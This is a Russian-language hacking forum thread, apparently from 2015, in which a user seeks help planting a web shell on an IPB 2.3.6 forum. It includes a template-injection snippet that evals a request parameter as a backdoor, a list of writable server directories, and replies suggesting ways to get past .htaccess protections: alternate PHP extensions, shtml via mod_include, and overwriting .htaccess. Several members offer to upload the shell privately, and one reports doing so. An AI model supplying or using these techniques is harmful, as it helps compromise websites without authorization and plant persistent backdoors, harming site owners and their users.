Помогите с заливкой шелла на IPB

Discussion in 'Песочница' started by nikonic, 10 Jun 2015.

  1. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Есть форум на ipb 2.3.6,пробовал такие способы заливки,через sql не идет(нет привилегий),через аватарку при помощи прикрепленных файлов открывает как текст,при добавлении настройки с выполнением пхп кода шелл грузиться но открывается как текст,прошу помочь с загрузкой и объясните как залить через смайлы или шаблон.
    _____________________________________
    Code:
    Директория или файл /local/www/форум/style_images недоступны для записи
Директория или файл /local/www/форум/style_emoticons недоступны для записи
/local/www/форум/cache доступен для записи
Директория или файл /local/www/форум/cache/skin_cache недоступны для записи
Директория или файл /local/www/форум/cache/lang_cache недоступны для записи
/local/www/форум/uploads доступен для записи
    ____________________________________
    при добавлении кода в шаблон
    Code:
    <if="$this->ipsclass->input['testKey'] = 123">
<if="eval($this->ipsclass->input['code'])"></if>
</if>
    происходит такая ошибка(
    Невозможно произвести запись в файл кеша cache/skin_cache/cacheid_3
    Шаблон(ы) в базе данных обновлен(ы)
     
    #1 nikonic, 10 Jun 2015
    Last edited: 10 Jun 2015
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    код-то можете исполнить? открывается как текст, потому что htaccess. ищите другую папку на запись или удалите htaccess (только именно тот, который открывает php как plain text)
     
    _________________________
    #2 yarbabin, 10 Jun 2015
  3. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    пхп код выполняется,как можно удалить .htaccess,он именно в папке например uploads или может из корня все блочить?
     
    #3 nikonic, 10 Jun 2015
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    попробуйте phtml, pht, php3, php4, php5
     
    _________________________
    #4 yarbabin, 10 Jun 2015
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    если есть mod_include то можно посмотреть в сторону shtml (при условии что аватарки или что там не в БД, а как реальные файлы)
     
    #5 Scipio, 10 Jun 2015
  6. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    ничего не помогло,открывает как текст
     
    #6 nikonic, 10 Jun 2015
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    А вы попробуйте с помощью того же кода записаться в файл .htaccess, тем самым изменить его. пару раз помогало
     
    #7 Br@!ns, 10 Jun 2015
  8. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    вот еще какой прикол
    заливал шелл в uploads,открывает как тест,но когда зашел в центр безопасности...
    Code:
    Защита файлом «.htaccess»
IPB может записать файл «.htaccess» в директории, где не содержатся php-файлы, препятствуя тем самым запуску файлов PHP и CGI в этих директориях.
IPB не обнаружил какие-либо «.htaccess» файлы.
    то есть где он может быть?один в корне?
     
    #8 nikonic, 10 Jun 2015
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Можешь в личку скинуть? Поссмотрю
     
    #9 Br@!ns, 11 Jun 2015
  10. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    В личку доступ, залью.
     
    #10 sysjuk, 16 Jun 2015
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    шелл залил, но там почти нет прав
     
    _________________________
    #11 yarbabin, 16 Jun 2015
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Есть права. Не так просто надо было делать.
     
    _________________________
    #12 BigBear, 16 Jun 2015
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ?
     
    _________________________
    #13 yarbabin, 16 Jun 2015
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Узрите ПМ, сударь
     
    _________________________
    #14 BigBear, 16 Jun 2015
(You must log in or sign up to post here.)
Loading...
Similar Threads - Помогите заливкой шелла
  1. navai

    Подскажите шелл на PHP8, Linux 4

    navai, 16 Mar 2023, in forum: Песочница
    Replies:
    3
    Views:
    3,325
    navai
    20 Mar 2023
  2. gilo20

    Вопрос по шеллу

    gilo20, 26 Feb 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,665
    crlf
    27 Feb 2023
  3. navai

    Можно ли залить .htaccess на WP? Или как залить шелл

    navai, 4 Jan 2023, in forum: Песочница
    Replies:
    3
    Views:
    3,362
    lifescore
    14 Jan 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.